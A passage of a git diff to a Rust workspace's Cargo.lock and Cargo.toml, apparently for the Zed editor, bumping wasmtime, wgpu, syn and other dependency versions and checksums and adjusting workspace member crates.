+checksum = "f3c62ea3fa30e6b0cf61116b3035121b8f515c60ac118ebfdab2ee56d028ed1e" dependencies = [ - "cfg-if", + "anyhow", + "log", + "tracing", + "wasmtime", + "wasmtime-internal-c-api-macros", ] [[package]] -name = "wasmtime-c-api-impl" -version = "33.0.2" +name = "wasmtime-environ" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "46db556f1dccdd88e0672bd407162ab0036b72e5eccb0f4398d8251cba32dba1" +checksum = "733682a327755c77153ac7455b1ba8f2db4d9946c1738f8002fe1fbda1d52e83" dependencies = [ "anyhow", + "cpp_demangle", + "cranelift-bitset", + "cranelift-entity", + "gimli", + "indexmap", "log", - "tracing", - "wasmtime", - "wasmtime-c-api-macros", + "object", + "postcard", + "rustc-demangle", + "semver", + "serde", + "serde_derive", + "smallvec", + "target-lexicon 0.13.3", + "wasm-encoder 0.236.1", + "wasmparser 0.236.1", + "wasmprinter", + "wasmtime-internal-component-util", +] + +[[package]] +name = "wasmtime-internal-asm-macros" +version = "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "68288980a2e02bcb368d436da32565897033ea21918007e3f2bae18843326cf9" +dependencies = [ + "cfg-if", ] [[package]] -name = "wasmtime-c-api-macros" -version = "33.0.2" +name = "wasmtime-internal-c-api-macros" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "315cc6bc8cdc66f296accb26d7625ae64c1c7b6da6f189e8a72ce6594bf7bd36" +checksum = "3c8c61294155a6d23c202f08cf7a2f9392a866edd50517508208818be626ce9f" dependencies = [ "proc-macro2", "quote", ] [[package]] -name = "wasmtime-component-macro" -version = "33.0.2" +name = "wasmtime-internal-component-macro" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "25c9c7526675ff9a9794b115023c4af5128e3eb21389bfc3dc1fd344d549258f" +checksum = "5dea846da68f8e776c8a43bde3386022d7bb74e713b9654f7c0196e5ff2e4684" dependencies = [ "anyhow", "proc-macro2", "quote", - "syn 
2.0.106", - "wasmtime-component-util", - "wasmtime-wit-bindgen", - "wit-parser 0.229.0", + "syn 2.0.117", + "wasmtime-internal-component-util", + "wasmtime-internal-wit-bindgen", + "wit-parser 0.236.1", ] [[package]] -name = "wasmtime-component-util" -version = "33.0.2" +name = "wasmtime-internal-component-util" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc42ec8b078875804908d797cb4950fec781d9add9684c9026487fd8eb3f6291" +checksum = "fe1e5735b3c8251510d2a55311562772d6c6fca9438a3d0329eb6e38af4957d6" [[package]] -name = "wasmtime-cranelift" -version = "33.0.2" +name = "wasmtime-internal-cranelift" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b2bd72f0a6a0ffcc6a184ec86ac35c174e48ea0e97bbae277c8f15f8bf77a566" +checksum = "e89bb9ef571288e2be6b8a3c4763acc56c348dcd517500b1679d3ffad9e4a757" dependencies = [ "anyhow", "cfg-if", @@ -19401,104 +19800,132 @@ dependencies = [ "cranelift-entity", "cranelift-frontend", "cranelift-native", - "gimli 0.31.1", + "gimli", "itertools 0.14.0", "log", - "object 0.36.7", + "object", "pulley-interpreter", "smallvec", "target-lexicon 0.13.3", "thiserror 2.0.17", - "wasmparser 0.229.0", + "wasmparser 0.236.1", "wasmtime-environ", - "wasmtime-versioned-export-macros", + "wasmtime-internal-math", + "wasmtime-internal-versioned-export-macros", ] [[package]] -name = "wasmtime-environ" -version = "33.0.2" +name = "wasmtime-internal-fiber" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6187bb108a23eb25d2a92aa65d6c89fb5ed53433a319038a2558567f3011ff2" +checksum = "b698d004b15ea1f1ae2d06e5e8b80080cbd684fd245220ce2fac3cdd5ecf87f2" dependencies = [ "anyhow", - "cpp_demangle", - "cranelift-bitset", - "cranelift-entity", - "gimli 0.31.1", - "indexmap", - "log", - "object 0.36.7", - "postcard", - "rustc-demangle", - "semver", - "serde", - "serde_derive", - "smallvec", - "target-lexicon 0.13.3", - 
"wasm-encoder 0.229.0", - "wasmparser 0.229.0", - "wasmprinter", - "wasmtime-component-util", + "cc", + "cfg-if", + "libc", + "rustix 1.1.2", + "wasmtime-internal-asm-macros", + "wasmtime-internal-versioned-export-macros", + "windows-sys 0.60.2", ] [[package]] -name = "wasmtime-fiber" -version = "33.0.2" +name = "wasmtime-internal-jit-debug" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dc8965d2128c012329f390e24b8b2758dd93d01bf67e1a1a0dd3d8fd72f56873" +checksum = "c803a9fec05c3d7fa03474d4595079d546e77a3c71c1d09b21f74152e2165c17" dependencies = [ - "anyhow", "cc", - "cfg-if", - "rustix 1.1.2", - "wasmtime-asm-macros", - "wasmtime-versioned-export-macros", - "windows-sys 0.59.0", + "wasmtime-internal-versioned-export-macros", ] [[package]] -name = "wasmtime-jit-icache-coherence" -version = "33.0.2" +name = "wasmtime-internal-jit-icache-coherence" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7af0e940cb062a45c0b3f01a926f77da5947149e99beb4e3dd9846d5b8f11619" +checksum = "d3866909d37f7929d902e6011847748147e8734e9d7e0353e78fb8b98f586aee" dependencies = [ "anyhow", "cfg-if", "libc", - "windows-sys 0.59.0", + "windows-sys 0.60.2", ] [[package]] -name = "wasmtime-math" -version = "33.0.2" +name = "wasmtime-internal-math" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "acfca360e719dda9a27e26944f2754ff2fd5bad88e21919c42c5a5f38ddd93cb" +checksum = "5a23b03fb14c64bd0dfcaa4653101f94ade76c34a3027ed2d6b373267536e45b" dependencies = [ "libm", ] [[package]] -name = "wasmtime-slab" -version = "33.0.2" +name = "wasmtime-internal-slab" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "48e240559cada55c4b24af979d5f6c95e0029f5772f32027ec3c62b258aaff65" +checksum = "fbff220b88cdb990d34a20b13344e5da2e7b99959a5b1666106bec94b58d6364" + +[[package]] +name = "wasmtime-internal-unwinder" +version 
= "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "13e1ad30e88988b20c0d1c56ea4b4fbc01a8c614653cbf12ca50c0dcc695e2f7" +dependencies = [ + "anyhow", + "cfg-if", + "cranelift-codegen", + "log", + "object", +] [[package]] -name = "wasmtime-versioned-export-macros" -version = "33.0.2" +name = "wasmtime-internal-versioned-export-macros" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d0963c1438357a3d8c0efe152b4ef5259846c1cf8b864340270744fe5b3bae5e" +checksum = "549aefdaa1398c2fcfbf69a7b882956bb5b6e8e5b600844ecb91a3b5bf658ca7" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", +] + +[[package]] +name = "wasmtime-internal-winch" +version = "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5cc96a84c5700171aeecf96fa9a9ab234f333f5afb295dabf3f8a812b70fe832" +dependencies = [ + "anyhow", + "cranelift-codegen", + "gimli", + "object", + "target-lexicon 0.13.3", + "wasmparser 0.236.1", + "wasmtime-environ", + "wasmtime-internal-cranelift", + "winch-codegen", +] + +[[package]] +name = "wasmtime-internal-wit-bindgen" +version = "36.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c28dc9efea511598c88564ac1974e0825c07d9c0de902dbf68f227431cd4ff8c" +dependencies = [ + "anyhow", + "bitflags 2.10.0", + "heck 0.5.0", + "indexmap", + "wit-parser 0.236.1", ] [[package]] name = "wasmtime-wasi" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ae951b72c7c6749a1c15dcdfb6d940a2614c932b4a54f474636e78e2c744b4c" +checksum = "c3c2e99fbaa0c26b4680e0c9af07e3f7b25f5fbc1ad97dd34067980bd027d3e5" dependencies = [ "anyhow", "async-trait", @@ -19510,7 +19937,7 @@ dependencies = [ "cap-std", "cap-time-ext", "fs-set-times", - "futures 0.3.31", + "futures 0.3.32", "io-extras", "io-lifetimes", "rustix 1.1.2", @@ -19522,51 +19949,22 @@ dependencies = [ 
"wasmtime", "wasmtime-wasi-io", "wiggle", - "windows-sys 0.59.0", + "windows-sys 0.60.2", ] [[package]] name = "wasmtime-wasi-io" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a835790dcecc3d7051ec67da52ba9e04af25e1bc204275b9391e3f0042b10797" +checksum = "de2dc367052562c228ce51ee4426330840433c29c0ea3349eca5ddeb475ecdb9" dependencies = [ "anyhow", "async-trait", "bytes 1.11.1", - "futures 0.3.31", + "futures 0.3.32", "wasmtime", ] -[[package]] -name = "wasmtime-winch" -version = "33.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cbc3b117d03d6eeabfa005a880c5c22c06503bb8820f3aa2e30f0e8d87b6752f" -dependencies = [ - "anyhow", - "cranelift-codegen", - "gimli 0.31.1", - "object 0.36.7", - "target-lexicon 0.13.3", - "wasmparser 0.229.0", - "wasmtime-cranelift", - "wasmtime-environ", - "winch-codegen", -] - -[[package]] -name = "wasmtime-wit-bindgen" -version = "33.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1382f4f09390eab0d75d4994d0c3b0f6279f86a571807ec67a8253c87cf6a145" -dependencies = [ - "anyhow", - "heck 0.5.0", - "indexmap", - "wit-parser 0.229.0", -] - [[package]] name = "wast" version = "35.0.2" @@ -19581,10 +19979,9 @@ name = "watch" version = "0.1.0" dependencies = [ "ctor", - "futures 0.3.31", + "futures 0.3.32", "gpui", "parking_lot", - "rand 0.9.2", "zlog", ] @@ -19703,9 +20100,9 @@ dependencies = [ [[package]] name = "web-sys" -version = "0.3.81" +version = "0.3.90" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9367c417a924a74cae129e6a2ae3b47fabb1f8995595ab474029da749a8be120" +checksum = "705eceb4ce901230f8625bd1d665128056ccbe4b7408faa625eec1ba80f59a97" dependencies = [ "js-sys", "wasm-bindgen", @@ -19718,6 +20115,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb" dependencies = [ 
"js-sys", + "serde", "wasm-bindgen", ] @@ -19750,8 +20148,9 @@ version = "0.1.0" dependencies = [ "anyhow", "client", + "cloud_api_types", "cloud_llm_client", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "language_model", @@ -19780,25 +20179,27 @@ dependencies = [ [[package]] name = "webrtc-sys" -version = "0.3.7" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.3.23" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ "cc", "cxx", "cxx-build", "glob", "log", + "pkg-config", "webrtc-sys-build", ] [[package]] name = "webrtc-sys-build" -version = "0.3.6" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=5f04705ac3f356350ae31534ffbc476abc9ea83d#5f04705ac3f356350ae31534ffbc476abc9ea83d" +version = "0.3.13" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1#147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" dependencies = [ + "anyhow", "fs2", "regex", - "reqwest 0.11.27", + "reqwest 0.12.24", "scratch", "semver", "zip 0.6.6", @@ -19812,9 +20213,8 @@ checksum = "a751b3277700db47d3e574514de2eced5e54dc8a5436a3bf7a0b248b2cee16f3" [[package]] name = "wgpu" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f9cb534d5ffd109c7d1135f34cdae29e60eab94855a625dcfe1705f8bc7ad79f" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", "bitflags 2.10.0", @@ -19825,7 +20225,7 @@ dependencies = [ "hashbrown 0.16.1", "js-sys", "log", - "naga", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "parking_lot", "portable-atomic", "profiling", @@ -19842,13 +20242,12 @@ dependencies = [ 
[[package]] name = "wgpu-core" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8bb4c8b5db5f00e56f1f08869d870a0dff7c8bc7ebc01091fec140b0cf0211a9" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", - "bit-set", - "bit-vec", + "bit-set 0.9.1", + "bit-vec 0.9.1", "bitflags 2.10.0", "bytemuck", "cfg_aliases 0.2.1", @@ -19856,7 +20255,7 @@ dependencies = [ "hashbrown 0.16.1", "indexmap", "log", - "naga", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "once_cell", "parking_lot", "portable-atomic", @@ -19869,52 +20268,48 @@ dependencies = [ "wgpu-core-deps-emscripten", "wgpu-core-deps-windows-linux-android", "wgpu-hal", + "wgpu-naga-bridge", "wgpu-types", ] [[package]] name = "wgpu-core-deps-apple" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "87b7b696b918f337c486bf93142454080a32a37832ba8a31e4f48221890047da" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-core-deps-emscripten" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34b251c331f84feac147de3c4aa3aa45112622a95dd7ee1b74384fa0458dbd79" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = "wgpu-core-deps-windows-linux-android" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "68ca976e72b2c9964eb243e281f6ce7f14a514e409920920dcda12ae40febaae" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "wgpu-hal", ] [[package]] name = 
"wgpu-hal" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "293080d77fdd14d6b08a67c5487dfddbf874534bb7921526db56a7b75d7e3bef" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "android_system_properties", "arrayvec", "ash", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", - "block", + "block2", "bytemuck", "cfg-if", "cfg_aliases 0.2.1", - "core-graphics-types 0.2.0", "glow", "glutin_wgl_sys", "gpu-allocator", @@ -19925,10 +20320,13 @@ dependencies = [ "libc", "libloading", "log", - "metal", - "naga", + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", "ndk-sys", - "objc", + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-metal", + "objc2-quartz-core", "once_cell", "ordered-float 4.6.0", "parking_lot", @@ -19937,26 +20335,38 @@ dependencies = [ "profiling", "range-alloc", "raw-window-handle", + "raw-window-metal", "renderdoc-sys", "smallvec", "thiserror 2.0.17", "wasm-bindgen", + "wayland-sys", "web-sys", + "wgpu-naga-bridge", "wgpu-types", "windows 0.62.2", "windows-core 0.62.2", ] +[[package]] +name = "wgpu-naga-bridge" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" +dependencies = [ + "naga 29.0.0 (git+https://github.com/zed-industries/wgpu.git?branch=v29)", + "wgpu-types", +] + [[package]] name = "wgpu-types" -version = "28.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e18308757e594ed2cd27dddbb16a139c42a683819d32a2e0b1b0167552f5840c" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "bitflags 2.10.0", "bytemuck", "js-sys", "log", + "raw-window-handle", "web-sys", ] @@ -19992,7 +20402,7 @@ dependencies = [ "gpui", "serde", "settings", - "theme", + 
"theme_settings", "ui", "util", "workspace", @@ -20010,9 +20420,9 @@ dependencies = [ [[package]] name = "wiggle" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "649c1aca13ef9e9dccf2d5efbbebf12025bc5521c3fb7754355ef60f5eb810be" +checksum = "c13d1ae265bd6e5e608827d2535665453cae5cb64950de66e2d5767d3e32c43a" dependencies = [ "anyhow", "async-trait", @@ -20025,27 +20435,27 @@ dependencies = [ [[package]] name = "wiggle-generate" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "164870fc34214ee42bd81b8ce9e7c179800fa1a7d4046d17a84e7f7bf422c8ad" +checksum = "607c4966f6b30da20d24560220137cbd09df722f0558eac81c05624700af5e05" dependencies = [ "anyhow", "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "witx", ] [[package]] name = "wiggle-macro" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d873bb5b59ca703b5e41562e96a4796d1af61bf4cf80bf8a7abda755a380ec1c" +checksum = "fc36e39412fa35f7cc86b3705dbe154168721dd3e71f6dc4a726b266d5c60c55" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "wiggle-generate", ] @@ -20071,7 +20481,7 @@ version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.48.0", + "windows-sys 0.61.2", ] [[package]] @@ -20082,21 +20492,22 @@ checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "winch-codegen" -version = "33.0.2" +version = "36.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7914c296fbcef59d1b89a15e82384d34dc9669bc09763f2ef068a28dd3a64ebf" +checksum = "06c0ec09e8eb5e850e432da6271ed8c4a9d459a9db3850c38e98a3ee9d015e79" dependencies = [ "anyhow", "cranelift-assembler-x64", 
"cranelift-codegen", - "gimli 0.31.1", + "gimli", "regalloc2", "smallvec", "target-lexicon 0.13.3", "thiserror 2.0.17", - "wasmparser 0.229.0", - "wasmtime-cranelift", + "wasmparser 0.236.1", "wasmtime-environ", + "wasmtime-internal-cranelift", + "wasmtime-internal-math", ] [[package]] @@ -20268,7 +20679,7 @@ checksum = "9107ddc059d5b6fbfbffdfa7a7fe3e22a226def0b2608f72e9d552763d3e1ad7" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20279,7 +20690,7 @@ checksum = "2bbd5b46c938e506ecbce286b6628a02171d56153ba733b6c741fc627ec9579b" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20290,7 +20701,7 @@ checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20301,7 +20712,7 @@ checksum = "29bee4b38ea3cde66011baa44dba677c432a78593e202392d1e9070cf2a7fca7" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20312,7 +20723,7 @@ checksum = "053c4c462dc91d3b1504c6fe5a726dd15e216ba718e84a0e46a88fbe5ded3515" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20323,7 +20734,7 @@ checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -20933,7 +21344,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c4db52a11d4dfb0a59f194c064055794ee6564eb1ced88c25da2cf76e50c5621" dependencies = [ "bitflags 2.10.0", - "futures 0.3.31", + "futures 0.3.32", "once_cell", ] @@ -20961,7 +21372,7 @@ dependencies = [ "heck 0.5.0", "indexmap", "prettyplease", - "syn 2.0.106", + "syn 2.0.117", "wasm-metadata 0.227.1", "wit-bindgen-core 0.41.0", "wit-component 0.227.1", @@ -20977,7 +21388,7 @@ dependencies = [ "heck 0.5.0", "indexmap", "prettyplease", - "syn 2.0.106", + "syn 
2.0.117", "wasm-metadata 0.244.0", "wit-bindgen-core 0.51.0", "wit-component 0.244.0", @@ -20992,7 +21403,7 @@ dependencies = [ "anyhow", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "wit-bindgen-core 0.22.0", "wit-bindgen-rust 0.22.0", ] @@ -21007,7 +21418,7 @@ dependencies = [ "prettyplease", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "wit-bindgen-core 0.41.0", "wit-bindgen-rust 0.41.0", ] @@ -21022,7 +21433,7 @@ dependencies = [ "prettyplease", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "wit-bindgen-core 0.51.0", "wit-bindgen-rust 0.51.0", ] @@ -21122,9 +21533,9 @@ dependencies = [ [[package]] name = "wit-parser" -version = "0.229.0" +version = "0.236.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "459c6ba62bf511d6b5f2a845a2a736822e38059c1cfa0b644b467bbbfae4efa6" +checksum = "16e4833a20cd6e85d6abfea0e63a399472d6f88c6262957c17f546879a80ba15" dependencies = [ "anyhow", "id-arena", @@ -21135,7 +21546,7 @@ dependencies = [ "serde_derive", "serde_json", "unicode-xid", - "wasmparser 0.229.0", + "wasmparser 0.236.1", ] [[package]] @@ -21172,20 +21583,19 @@ dependencies = [ name = "workspace" version = "0.1.0" dependencies = [ + "agent_settings", "any_vec", "anyhow", "async-recursion", - "call", "chrono", "client", "clock", "collections", "component", - "dap", "db", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "gpui", "http_client", @@ -21212,9 +21622,11 @@ dependencies = [ "telemetry", "tempfile", "theme", + "theme_settings", "ui", "util", "uuid", + "vim_mode_setting", "windows 0.61.3", "zed_actions", "zlog", @@ -21231,12 +21643,10 @@ dependencies = [ "collections", "encoding_rs", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "git", - "git2", "gpui", - "http_client", "ignore", "language", "log", @@ -21440,16 +21850,23 @@ checksum = "ec7a2a501ed189703dba8b08142f057e887dfc4b2cc4db2d343ac6376ba3e0b9" name = "xtask" version = "0.1.0" dependencies = [ + 
"annotate-snippets", "anyhow", "backtrace", - "cargo_metadata", + "cargo_metadata 0.19.2", "cargo_toml", "clap", + "compliance", "gh-workflow", "indexmap", "indoc", + "itertools 0.14.0", + "regex", "serde", "serde_json", + "serde_yaml", + "strum 0.27.2", + "tokio", "toml 0.8.23", "toml_edit 0.22.27", ] @@ -21480,7 +21897,7 @@ dependencies = [ "base64 0.22.1", "bytes 1.11.1", "flate2", - "futures 0.3.31", + "futures 0.3.32", "http-body-util", "hyper 1.7.0", "hyper-util", @@ -21549,7 +21966,7 @@ checksum = "2380878cad4ac9aac1e2435f3eb4020e8374b5f13c296cb75b4620ff8e229154" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "synstructure", ] @@ -21561,7 +21978,7 @@ checksum = "38da3c9736e16c5d3c8c597a9aaa5d1fa565d0532ae05e27c24aa62fb32c0ab6" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "synstructure", ] @@ -21609,7 +22026,7 @@ dependencies = [ "proc-macro-crate", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "zbus_names", "zvariant", "zvariant_utils", @@ -21628,7 +22045,7 @@ dependencies = [ [[package]] name = "zed" -version = "0.227.0" +version = "0.232.0" dependencies = [ "acp_thread", "acp_tools", @@ -21646,7 +22063,6 @@ dependencies = [ "audio", "auto_update", "auto_update_ui", - "bincode", "breadcrumbs", "call", "channel", @@ -21665,7 +22081,7 @@ dependencies = [ "copilot_chat", "copilot_ui", "crashes", - "dap", + "csv_preview", "dap_adapters", "db", "debug_adapter_extension", @@ -21686,7 +22102,7 @@ dependencies = [ "feedback", "file_finder", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "git_graph", "git_hosting_providers", @@ -21729,6 +22145,7 @@ dependencies = [ "parking_lot", "paths", "picker", + "pkg-config", "pretty_assertions", "profiling", "project", @@ -21756,7 +22173,6 @@ dependencies = [ "smol", "snippet_provider", "snippets_ui", - "supermaven", "svg_preview", "sysinfo 0.37.2", "system_specs", @@ -21770,13 +22186,12 @@ dependencies = [ "theme", "theme_extension", "theme_selector", 
+ "theme_settings", "time", "time_format", "title_bar", "toolchain_selector", "tracing", - "tree-sitter-md", - "tree-sitter-rust", "ui", "ui_prompt", "url", @@ -21919,10 +22334,24 @@ dependencies = [ ] [[package]] -name = "zed_env_vars" +name = "zed_credentials_provider" version = "0.1.0" dependencies = [ + "anyhow", + "credentials_provider", + "futures 0.3.32", "gpui", + "paths", + "release_channel", + "serde", + "serde_json", +] + +[[package]] +name = "zed_env_vars" +version = "0.1.0" +dependencies = [ + "env_var", ] [[package]] @@ -21958,21 +22387,21 @@ dependencies = [ [[package]] name = "zed_glsl" -version = "0.2.0" +version = "0.2.3" dependencies = [ "zed_extension_api 0.1.0", ] [[package]] name = "zed_html" -version = "0.3.0" +version = "0.3.1" dependencies = [ "zed_extension_api 0.7.0", ] [[package]] name = "zed_proto" -version = "0.3.1" +version = "0.3.2" dependencies = [ "zed_extension_api 0.7.0", ] @@ -22007,7 +22436,7 @@ checksum = "88d2b8d9c68ad2b9e4340d7832716a4d21a22a1154777ad56ea55c51a9cf3831" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -22027,7 +22456,7 @@ checksum = "d71e5d6e06ab090c67b5e44993ec16b72dcbaabc526db883a360057678b48502" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "synstructure", ] @@ -22048,7 +22477,7 @@ checksum = "ce36e65b0d2999d2aafac989fb249189a141aee1f53c612c1f37d72631959f69" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -22063,7 +22492,7 @@ dependencies = [ "asynchronous-codec", "bytes 1.11.1", "crossbeam-queue", - "futures 0.3.31", + "futures 0.3.32", "log", "num-traits", "once_cell", @@ -22105,7 +22534,7 @@ checksum = "5b96237efa0c878c64bd89c436f661be4e46b2f3eff1ebb976f7ef2321d2f58f" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -22113,6 +22542,7 @@ name = "zeta_prompt" version = "0.1.0" dependencies = [ "anyhow", + "imara-diff", "indoc", "serde", "strum 
0.27.2", @@ -22126,7 +22556,7 @@ checksum = "760394e246e4c28189f19d488c058bf16f564016aefac5d32bb1f3b51d5e9261" dependencies = [ "aes", "byteorder", - "bzip2", + "bzip2 0.4.4", "constant_time_eq", "crc32fast", "crossbeam-utils", @@ -22267,7 +22697,7 @@ dependencies = [ "proc-macro-crate", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", "zvariant_utils", ] @@ -22280,6 +22710,6 @@ dependencies = [ "proc-macro2", "quote", "serde", - "syn 2.0.106", + "syn 2.0.117", "winnow", ] diff --git a/Cargo.toml b/Cargo.toml index ac80f187e6ffc16a95753e83ae7a333c6bc9ffdb..5cb5b991b645ec1b78b16f48493c7c8dc1426344 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -13,9 +13,6 @@ members = [ "crates/anthropic", "crates/askpass", "crates/assets", - "crates/assistant_slash_command", - "crates/assistant_slash_commands", - "crates/assistant_text_thread", "crates/audio", "crates/auto_update", "crates/auto_update_helper", @@ -45,6 +42,7 @@ members = [ "crates/copilot_chat", "crates/crashes", "crates/credentials_provider", + "crates/csv_preview", "crates/dap", "crates/dap_adapters", "crates/db", @@ -63,8 +61,9 @@ members = [ "crates/edit_prediction_ui", "crates/editor", "crates/encoding_selector", + "crates/env_var", "crates/etw_tracing", - "crates/eval", + "crates/eval_cli", "crates/eval_utils", "crates/explorer_command_injector", "crates/extension", @@ -85,6 +84,7 @@ members = [ "crates/git_ui", "crates/go_to_line", "crates/google_ai", + "crates/grammars", "crates/gpui", "crates/gpui_linux", "crates/gpui_macos", @@ -106,6 +106,7 @@ members = [ "crates/json_schema_store", "crates/keymap_editor", "crates/language", + "crates/language_core", "crates/language_extension", "crates/language_model", "crates/language_models", @@ -132,6 +133,7 @@ members = [ "crates/notifications", "crates/ollama", "crates/onboarding", + "crates/opencode", "crates/open_ai", "crates/open_path_prompt", "crates/open_router", @@ -157,7 +159,6 @@ members = [ "crates/remote_server", "crates/repl", 
